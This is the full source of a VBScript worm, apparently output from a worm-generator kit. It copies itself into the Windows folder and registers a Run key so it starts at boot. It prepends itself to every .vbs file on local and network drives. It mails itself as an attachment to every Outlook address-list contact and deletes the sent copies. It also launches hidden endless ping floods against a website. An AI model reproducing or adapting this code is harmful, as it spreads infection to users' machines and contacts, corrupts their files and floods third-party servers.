'1
'Name : 1
'Author : 1
On Error Resume Next
Set aucwfa = CreateObject("Scripting.FileSystemObject")
Set ascoia = CreateObject("WScript.Shell")
Set win = aucwfa.GetSpecialFolder(0)
Set sys = aucwfa.GetSpecialFolder(1)

copyname = win&"\name_of_worm.vbs"
aucwfa.GetFile(WScript.ScriptFullName).Copy(copyname)
ascoia.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\value_worm",copyname

Set fl = aucwfa.OpenTextFile(WScript.ScriptFullName, 1)
virus = fl.ReadAll
fl.Close
infectfile()
Sub infectfile()
On Error Resume Next
Set aucwfa = CreateObject("Scripting.FileSystemObject")
Set amzs = aucwfa.Drives
For Each d In amzs
If d.DriveType = 2 Or d.DriveType = 3 Then
list(d.path&"\")
End If
Next
End Sub

Sub list(doss)
On Error Resume Next
Set aucwfa = CreateObject("Scripting.FileSystemObject")
Set mbsf = aucwfa.GetFolder(doss)
Set ziwfi = mbsf.SubFolders
For Each f1 In ziwfi
infect(f1.Path)
list(f1.Path)
Next
End Sub

Sub infect(doss)
On Error Resume Next
Set aucwfa = CreateObject("Scripting.FileSystemObject")
Set mbsf = aucwfa.GetFolder(doss)
Set fc = mbsf.Files
For Each f1 In fc
ext = aucwfa.GetExtensionName(f1.Path)
ext = lCase(ext)
If (ext = "vbs") Then
    Set cot = aucwfa.OpenTextFile(f1.Path, 1, False)
    If cot.ReadLine <> "'1" Then
    cot.Close
    Set cot = aucwfa.OpenTextFile(f1.Path, 1, False)
    vbsorg = cot.ReadAll()
    cot.Close
    Set inf = aucwfa.OpenTextFile(f1.Path, 2, True)
    inf.WriteLine virus
    inf.WriteLine ""
    inf.WriteLine (vbsorg)
    inf.Close
    End If
End If
Next
End Sub

Set xiwf = CreateObject("Outlook.Application")
Set maoz = xiwf.GetNameSpace("MAPI")
For each c In maoz.AddressLists
If c.AddressEntries.Count <> 0 Then
For d = 1 To c.AddressEntries.Count
Set dlphi = xiwf.CreateItem(0)
dlphi.To = c.AddressEntries(d).Address
dlphi.Subject = "Subject..."
dlphi.Body = "Body of the worm..."
dlphi.Attachments.Add(copyname)
dlphi.DeleteAfterSubmit = True
If dlphi.To <> "" Then
dlphi.Send
End If
Next
End If
Next

ascoia.Run ("ping.exe -t -l 20000 www.yahoo.com"),vbHide
ascoia.Run (win&"\ping.exe -t -l 20000 www.yahoo.com"),vbHide

MsgBox "Text of message box",vbinformation,"Title"

'This VBS virus/worm was generated by PVBSWG 1.0
